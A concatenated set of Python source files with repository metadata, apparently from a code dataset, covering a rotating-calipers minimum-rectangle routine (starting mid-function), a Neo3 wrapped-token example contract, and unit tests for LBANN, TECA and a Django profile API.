        key = next(it)
        nextPoint = bP[key][0]
        vec1 = pStack[-2] - pStack[-1]
        vec2 = nextPoint - pStack[-1]
        cP = vec1.crossProduct(vec2)
        while( cP > 0):
            pStack.pop(-1)
            vec1 = pStack[-2] - pStack[-1]
            vec2 = nextPoint - pStack[-1]
            cP = vec1.crossProduct(vec2)
        pStack.append(nextPoint)
    # Remove duplicate points lying on the same horizontal line, keeping
    # points on the top/bottom rows and the endpoints of each run.
    res = list()
    res.append(pStack[0])
    res.append(pStack[1])
    i = 1
    j = 2
    while(j < len(pStack)-1):
        if(res[i].y != pStack[j].y or pStack[j].x == top or pStack[j].x == bottom):
            res.append(pStack[j])
            i += 1
        elif(pStack[j].y != pStack[j+1].y):
            res.append(pStack[j])
            i += 1
        j += 1
    res.append(pStack[-1])
    return res
def getPointProjectionInLine(k, b, x, y):
    """Orthogonally project the point (x, y) onto the line y = k*x + b.

    :param k: slope of the line
    :param b: intercept of the line
    :param x: x coordinate of the point
    :param y: y coordinate of the point
    :return: Point2 at the foot of the perpendicular
    """
    px = (k * (y - b) + x) / (k * k + 1)
    py = k * px + b
    return Point2(px, py)
def getRectInfo(bottom1, bottom2, top, left, right):
    """Recover the 4 corners of the minimum enclosing rectangle from the
    5 extreme points found by the rotating-calipers search.

    :param bottom1: first point on the rectangle's bottom edge
    :param bottom2: second point on the rectangle's bottom edge
    :param top: point on the top edge
    :param left: point on the left edge
    :param right: point on the right edge
    :return: list of 4 corner Point2 objects
    """
    if bottom1.x == bottom2.x:
        # Bottom edge has constant x: corners mix the fixed x values with
        # the extreme y values.
        return [Point2(bottom1.x, right.y),
                Point2(bottom1.x, left.y),
                Point2(top.x, left.y),
                Point2(top.x, right.y)]
    if bottom1.y == bottom2.y:
        # Bottom edge has constant y: symmetric case.
        return [Point2(right.x, bottom1.y),
                Point2(left.x, bottom1.y),
                Point2(left.x, top.y),
                Point2(right.x, top.y)]
    # General case: project the left/right extremes onto the two parallel
    # support lines (bottom and top share the same slope).
    slope = (bottom1.y - bottom2.y) / (bottom1.x - bottom2.x)
    interceptBottom = bottom2.y - slope * bottom2.x
    interceptTop = top.y - slope * top.x
    return [getPointProjectionInLine(slope, interceptBottom, right.x, right.y),
            getPointProjectionInLine(slope, interceptBottom, left.x, left.y),
            getPointProjectionInLine(slope, interceptTop, left.x, left.y),
            getPointProjectionInLine(slope, interceptTop, right.x, right.y)]
# @fn Minimum enclosing rectangle via rotating calipers
# @param convexHullPoints convex hull point list
# @return Rect2 with the rectangle's 4 corners, short/long side and area
def getMinRectByRotatingCalipers(convexHullPoints):
    """Rotating-calipers search for the minimum-area enclosing rectangle.

    Every hull edge is tried as the rectangle's bottom side; the farthest
    (top), rightmost and leftmost hull vertices are advanced monotonically
    around the hull, and the edge yielding the smallest area wins.

    Returns -1 (not a Rect2) when fewer than 3 distinct hull points are
    given — callers must handle that sentinel.
    """
    # convexHullPoints[0] and convexHullPoints[-1] are the same point;
    # drop the last one so the duplicate does not affect the vertex
    # searches (searches operate on cHP1).
    cHP = convexHullPoints
    cHP1 = cHP[0:-1]
    pCnt = len(cHP1)
    # Fewer than 3 points is not handled.
    if(pCnt < 3):
        return -1
    # Initial search indices:
    # t - top vertex
    # r - rightmost vertex
    # l - leftmost vertex
    t = 2
    r = 2
    l = pCnt - 1
    # Best-so-far rectangle parameters.
    minArea = 0
    minT = 0
    minR = 0
    minL = 0
    minI = 0
    minH = 0
    minW = 0
    for i in range(0,pCnt):
        # Bottom edge vector.  The cross product against it locates the
        # hull point farthest from the edge (t); dot products (projections
        # onto the edge) locate the rightmost (r) and leftmost (l) points.
        vBottom = cHP[i+1] - cHP[i]
        # Advance the top vertex t while the cross product keeps growing.
        vTop = cHP1[t] - cHP[i]
        last = vBottom.crossProduct(vTop)
        curr = 0.0
        while(1):
            vTop = cHP1[(t+1)%pCnt] - cHP[i]
            curr = vBottom.crossProduct(vTop)
            if(curr > last):
                last = curr
            else:
                break
            t = (t+1) % pCnt
        # Advance the rightmost vertex r while its projection grows.
        vRight = cHP1[r] - cHP[i]
        last = vBottom.dotProduct(vRight)
        curr = 0.0
        while(1):
            vRight = cHP1[(r+1)%pCnt] - cHP[i]
            curr = vBottom.dotProduct(vRight)
            if(curr > last):
                last = curr
            else:
                break
            r = (r+1) % pCnt
        # Advance the leftmost vertex l while its projection shrinks.
        # On the first edge, start the left search from the top vertex.
        if(i == 0):
            l = t
        vLeft = cHP1[l] - cHP[i]
        last = vBottom.dotProduct(vLeft)
        curr = 0.0
        while(1):
            # NOTE: vRight is reused here for the left-side candidate.
            vRight = cHP1[(l+1)%pCnt] - cHP[i]
            curr = vBottom.dotProduct(vRight)
            if(curr < last):
                last = curr
            else:
                break
            l = (l+1) % pCnt
        # h and w are not the rectangle's side lengths themselves, but
        # their product w*h numerically equals the rectangle's area.
        h = vBottom.crossProduct(cHP1[t]-cHP[i]) / vBottom.dotProduct(vBottom)
        w = vBottom.dotProduct(cHP1[r]-cHP[i]) - vBottom.dotProduct(cHP1[l]-cHP[i])
        tmpArea = w * h
        if(i == 0 or tmpArea < minArea):
            minArea = tmpArea
            minI = i
            minT = t
            minR = r
            minL = l
            minH = h
            minW = w
    # Recover the 4 rectangle corners from the 5 extreme points.
    p = getRectInfo(cHP[minI],cHP[minI+1],cHP1[minT],cHP1[minL],cHP1[minR])
    tmpW = math.sqrt(math.pow(p[0].x - p[1].x, 2) + math.pow(p[0].y - p[1].y, 2))
    tmpH = math.sqrt(math.pow(p[0].x - p[3].x, 2) + math.pow(p[0].y - p[3].y, 2))
    # Short and long side lengths of the minimum enclosing rectangle.
    maxBorder = max(tmpW, tmpH)
    minBorder = min(tmpW, tmpH)
    rect = Rect2(p,minBorder,maxBorder,minArea)
    return rect
def getMER(src):
    """Compute the minimum enclosing rectangle (MER) of the foreground
    (pixel value 255) in a binary image.

    Pipeline: extract edge pixels, collect them with their bounding box,
    build the convex hull, then run rotating calipers on the hull.

    :param src: 2D binary image with foreground marked as 255
    :return: Rect2 describing the MER (or -1 for degenerate hulls)
    """
    edgeImg = getBinaryImageBorder(src, 255)
    borderInfo = getBorderInfo(edgeImg, 255)
    hullPoints = getConvexHull(borderInfo)
    return getMinRectByRotatingCalipers(hullPoints)
# Demo / manual test: load a binary image, compute its minimum enclosing
# rectangle and display it.  NOTE: the input path is hard-coded and the
# name 'input' shadows the Python builtin.
input = cv.imread("H://Test_Img//MBR.bmp",cv.IMREAD_GRAYSCALE)
cv.imshow("input",input)
minRect = getMER(input)
# Draw the minimum enclosing rectangle.  Point2 stores (x=row, y=col)
# while cv.line takes (col, row) pairs, hence the x/y swap below.
output = cv.cvtColor(input,cv.COLOR_GRAY2RGB)
cv.line(output,(round(minRect.p[0].y),round(minRect.p[0].x)),(round(minRect.p[1].y),round(minRect.p[1].x)),(0,255,0),1)
cv.line(output,(round(minRect.p[1].y),round(minRect.p[1].x)),(round(minRect.p[2].y),round(minRect.p[2].x)),(0,255,0),1)
cv.line(output,(round(minRect.p[2].y),round(minRect.p[2].x)),(round(minRect.p[3].y),round(minRect.p[3].x)),(0,255,0),1)
cv.line(output,(round(minRect.p[3].y),round(minRect.p[3].x)),(round(minRect.p[0].y),round(minRect.p[0].x)),(0,255,0),1)
cv.imshow("Min Rect",output)
cv.waitKey(0)
| 32.218182 | 119 | 0.491065 |
7afe24a90bc6663211ec3e0310eb4d5e8593c2b8 | 1,599 | py | Python | boa3_test/examples/test_native/example_contract_for_wrapped_tokens.py | DanPopa46/neo3-boa | e4ef340744b5bd25ade26f847eac50789b97f3e9 | [
"Apache-2.0"
] | null | null | null | boa3_test/examples/test_native/example_contract_for_wrapped_tokens.py | DanPopa46/neo3-boa | e4ef340744b5bd25ade26f847eac50789b97f3e9 | [
"Apache-2.0"
] | null | null | null | boa3_test/examples/test_native/example_contract_for_wrapped_tokens.py | DanPopa46/neo3-boa | e4ef340744b5bd25ade26f847eac50789b97f3e9 | [
"Apache-2.0"
] | null | null | null | from typing import Any
from boa3.builtin import NeoMetadata, metadata, public
from boa3.builtin.interop.contract import call_contract
from boa3.builtin.type import UInt160
# This smart contract is being used to call wrapped_neo's methods. The method calling_scripthash is returning None when
# the TestEngine is the one calling the function.
# Though, in the future, the TestEngine will return the correct address, rendering this smart contract useless
# TODO: delete this smart contract and change wrapped neo tests when the TestEngine gets updated
# -------------------------------------------
# METADATA
# -------------------------------------------
@metadata
def manifest_metadata() -> NeoMetadata:
    """
    Define this smart contract's manifest metadata.
    """
    info = NeoMetadata()
    info.author = "Mirella Medeiros, Ricardo Prado and Lucas Uezu. COZ in partnership with Simpli"
    info.email = "contact@coz.io"
    info.description = "Wrapped NEO Example"
    return info
@public
def calling_approve(address: UInt160, spender: UInt160, amount: int) -> Any:
    """Forward an 'approve' call to the token contract at *address*."""
    approve_args = [spender, amount]
    return call_contract(address, 'approve', approve_args)
@public
def calling_transfer(address: UInt160, from_address: UInt160, to_address: UInt160, amount: UInt160, data: Any) -> Any:
    """
    Forward a 'transfer' call to the token contract at *address*.

    :return: whether the transfer was successful.
    :rtype: bool
    """
    # NOTE(review): *amount* is annotated as UInt160 although it carries a
    # token amount — presumably a typo for int; confirm before changing,
    # since annotations affect the compiled contract's ABI.
    transfer_args = [from_address, to_address, amount, data]
    return call_contract(address, 'transfer', transfer_args)
# Always accept cryptocurrency
@public
def onNEP17Payment(from_address: UInt160, amount: int, data: Any):
    """NEP-17 payment callback; intentionally empty so that any transfer
    sent to this contract is accepted."""
    pass
| 31.98 | 119 | 0.704816 |
bff14d3e789d4054f0974056e94ba7184e9a1da2 | 1,898 | py | Python | bamboo/unit_tests/test_unit_layer_softsign.py | forsyth2/lbann | 64fc0346f65353c2f7526a019da964914e539fb0 | [
"Apache-2.0"
] | null | null | null | bamboo/unit_tests/test_unit_layer_softsign.py | forsyth2/lbann | 64fc0346f65353c2f7526a019da964914e539fb0 | [
"Apache-2.0"
] | null | null | null | bamboo/unit_tests/test_unit_layer_softsign.py | forsyth2/lbann | 64fc0346f65353c2f7526a019da964914e539fb0 | [
"Apache-2.0"
] | null | null | null | import sys
sys.path.insert(0, '../common_python')
import tools
import pytest
import os
def skeleton_layer_softsign(cluster, executables, dir_name, compiler_name):
    """Build and run the LBANN softsign-layer test for one compiler build.

    Skips the test (via pytest.skip) when no executable is registered for
    *compiler_name*; otherwise runs the generated command and asserts a
    zero exit status.
    """
    if compiler_name not in executables:
        reason = 'skeleton_layer_softsign: default_exes[{}] does not exist'.format(compiler_name)
        print('Skip - ' + reason)
        pytest.skip(reason)
    # Per-compiler stdout/stderr capture files under the bamboo tree.
    output_file_name = '{}/bamboo/unit_tests/output/layer_softsign_{}_output.txt'.format(dir_name, compiler_name)
    error_file_name = '{}/bamboo/unit_tests/error/layer_softsign_{}_error.txt'.format(dir_name, compiler_name)
    command = tools.get_command(
        cluster=cluster, executable=executables[compiler_name], num_nodes=1,
        num_processes=2, dir_name=dir_name,
        data_filedir_default='', data_reader_name='synthetic',
        model_folder='tests/layer_tests', model_name='softsign',
        optimizer_name='sgd',
        output_file_name=output_file_name, error_file_name=error_file_name)
    assert os.system(command) == 0
# Softsign layer unit test against the clang6 build.
def test_unit_layer_softsign_clang6(cluster, exes, dirname):
    skeleton_layer_softsign(cluster, exes, dirname, 'clang6')
# Softsign layer unit test against the gcc7 build.
def test_unit_layer_softsign_gcc7(cluster, exes, dirname):
    skeleton_layer_softsign(cluster, exes, dirname, 'gcc7')
# Softsign layer unit test against the intel19 build.
def test_unit_layer_softsign_intel19(cluster, exes, dirname):
    skeleton_layer_softsign(cluster, exes, dirname, 'intel19')
# NOTE(review): duplicate definition — this shadows the identical
# test_unit_layer_softsign_intel19 defined immediately above; one of the
# two was probably meant to target a different compiler.  Left in place
# because renaming/removing it would change the collected test suite.
def test_unit_layer_softsign_intel19(cluster, exes, dirname):
    skeleton_layer_softsign(cluster, exes, dirname, 'intel19')
# Run with python -m pytest -s test_unit_layer_softsign.py -k 'test_unit_layer_softsign_exe' --exe=<executable>
def test_unit_layer_softsign_exe(cluster, dirname, exe):
    """Run the softsign test against a user-supplied executable (--exe)."""
    if exe is None:
        reason = 'test_unit_layer_softsign_exe: Non-local testing'
        print('Skip - ' + reason)
        pytest.skip(reason)
    skeleton_layer_softsign(cluster, {'exe': exe}, dirname, 'exe')
| 37.96 | 111 | 0.739199 |
2cb9045112746fe61cfb05fce00c440afb3d77fa | 3,127 | py | Python | test/python/test_binary_stream.py | LBL-EESA/TECA | 63923b8a12914f3758dc9525239bc48cd8864b39 | [
"BSD-3-Clause-LBNL"
] | 34 | 2017-03-28T14:22:25.000Z | 2022-01-23T05:02:25.000Z | test/python/test_binary_stream.py | LBL-EESA/TECA | 63923b8a12914f3758dc9525239bc48cd8864b39 | [
"BSD-3-Clause-LBNL"
] | 476 | 2016-11-28T18:06:06.000Z | 2022-01-25T05:31:42.000Z | test/python/test_binary_stream.py | LBL-EESA/TECA | 63923b8a12914f3758dc9525239bc48cd8864b39 | [
"BSD-3-Clause-LBNL"
] | 19 | 2017-04-25T18:15:04.000Z | 2020-11-28T18:16:05.000Z | #!/usr/bin/env python
import sys
import os
from mpi4py import MPI
from teca import *
from math import pi,e
# MPI setup: this test requires at least two ranks so that a master and a
# distinct worker can exchange the serialized table.
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
n_ranks = comm.Get_size()
if n_ranks < 2:
    sys.stderr.write('ERROR: test requires at least 2 ranks\n')
    sys.exit(-1)
# Validate usage BEFORE touching argv: reading sys.argv[1] first raised an
# IndexError when the argument was missing, hiding the usage message below.
if len(sys.argv) != 2:
    sys.stderr.write('ERROR:\ntest_binary_stream.py [baseline]\n\n')
    sys.exit(-1)
# Path of the baseline table file to compare against or to generate.
baseline = sys.argv[1]
# Rank roles: the first rank drives the test, the last rank processes data.
master_rank = 0
worker_rank = n_ranks - 1
if rank == 0:
    sys.stderr.write('n_ranks = %d master_rank = %d ' \
        'worker_rank = %d\n'%(n_ranks, master_rank, worker_rank))
# Generate a 4-column table (type codes 'f','d','i','l') with five rows of
# known values; bs is the binary stream the table is serialized into and
# source feeds the final table into the regression pipeline below.
table = teca_table.New()
table.declare_columns(['A','B','C','D'],['f','d','i','l'])
table << .1 << .2 << 10 << 20 \
      << .2 << .4 << 20 << 40 \
      << pi << e << 30 << 60 \
      << 1.234e2 << 2.345e2 << 40 << 80 \
      << 1.234e-2 << 2.345e-2 << -50 << -100
bs = teca_binary_stream()
source = teca_dataset_source.New()
if rank == master_rank:
    # serialize the table into the binary stream
    table.to_stream(bs)
    # send the serialized bytes to the worker rank for processing
    comm.send(bs.get_data(), dest=worker_rank, tag=23)
    # receive the processed data back
    bs.clear()
    tmp = comm.recv(source=worker_rank, tag=27)
    bs.set_data(tmp)
    # deserialize into a new table object
    table = teca_table.New()
    table.from_stream(bs)
    sys.stderr.write("=\n")
    sys.stderr.write("%s"%(str(table)))
    # feed the regression test below with the updated table
    source.set_dataset(table)
if rank == worker_rank:
    # receive the serialized table
    tmp = comm.recv(source=master_rank, tag=23)
    bs.set_data(tmp)
    # generate the helper table holding the per-cell increments
    nums = teca_table.New()
    nums.declare_columns(['A','B','C','D'],['i','i','i','i'])
    # deserialize into a new object
    table = teca_table.New()
    table.from_stream(bs)
    sys.stderr.write("%s"%(str(table)))
    # modify the table in a predictable way: add the flat cell index
    # (row*ncols + col) to every cell
    nr = table.get_number_of_rows()
    nc = table.get_number_of_columns()
    j = 0
    while j < nr:
        i = 0
        while i < nc:
            q = j*nc + i
            nums[j,i] = q
            table[j,i] += nums[j,i]
            i += 1
        j += 1
    sys.stderr.write("+\n")
    sys.stderr.write("%s"%(str(nums)))
    # serialize the modified table
    bs.clear()
    table.to_stream(bs)
    # NOTE(review): tmp is assigned here but unused; the send below calls
    # bs.get_data() again.
    tmp = bs.get_data()
    # send the modified table back
    comm.send(bs.get_data(), dest=master_rank, tag=27)
# Compare against the stored baseline when testing is enabled and the
# baseline file exists; otherwise (re)generate the baseline file.
do_test = system_util.get_environment_variable_bool('TECA_DO_TEST', True)
if do_test and os.path.exists(baseline):
    table_reader = teca_table_reader.New()
    table_reader.set_file_name(baseline)
    # Diff stage: input 0 is the baseline, input 1 is the computed table.
    diff = teca_dataset_diff.New()
    diff.set_input_connection(0, table_reader.get_output_port())
    diff.set_input_connection(1, source.get_output_port())
    diff.set_executive(teca_index_executive.New())
    diff.update()
else:
    sys.stderr.write('generating baseline\n')
    table_writer = teca_table_writer.New()
    table_writer.set_input_connection(source.get_output_port())
    table_writer.set_file_name(baseline)
    table_writer.set_executive(teca_index_executive.New())
    table_writer.update()
| 25.422764 | 73 | 0.637992 |
d705a6ca17d362db09c40bbfa7e38d4390ef09c7 | 1,103 | py | Python | churchill/tests/api/v1/profile/test_profile_stats.py | manti-by/traugott | 6ae05a53c14b29a08daa02a8de1624671f8f063a | [
"BSD-3-Clause"
] | null | null | null | churchill/tests/api/v1/profile/test_profile_stats.py | manti-by/traugott | 6ae05a53c14b29a08daa02a8de1624671f8f063a | [
"BSD-3-Clause"
] | 11 | 2021-01-11T20:52:04.000Z | 2021-05-12T09:12:38.000Z | churchill/tests/api/v1/profile/test_profile_stats.py | manti-by/churchill | 6ae05a53c14b29a08daa02a8de1624671f8f063a | [
"BSD-3-Clause"
] | null | null | null | from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework.test import APIClient
import pytest
from churchill.tests.factories.shots import ShotFactory, ShotItemFactory
from churchill.tests.factories.users import UserFactory
@pytest.mark.django_db
class TestProfileStatsView:
    """Integration tests for the profile endpoint's 'stats' payload."""
    @pytest.fixture(autouse=True)
    def setup_method(self):
        # Fresh API client, resolved profile URL and a user for each test.
        self.client = APIClient()
        self.url = reverse("api:v1:profile:profile")
        self.user = UserFactory()
    def test_retrieve_stats_data(self):
        """Stats start empty and are populated after the first shot."""
        self.client.force_authenticate(self.user)
        response = self.client.get(self.url, format="json")
        assert response.status_code == status.HTTP_200_OK
        # No shots recorded yet -> stats payload is empty/falsy.
        assert not response.data["stats"]
        shot = ShotFactory()
        shot_item = ShotItemFactory(shot=shot, user=self.user)
        response = self.client.get(self.url, format="json")
        assert response.status_code == status.HTTP_200_OK
        # The newly created shot item drives the stats fields.
        assert response.data["stats"]["last_shot_at"] == shot_item.created_at
        assert response.data["stats"]["timedelta_last_shot"]
| 33.424242 | 77 | 0.721668 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.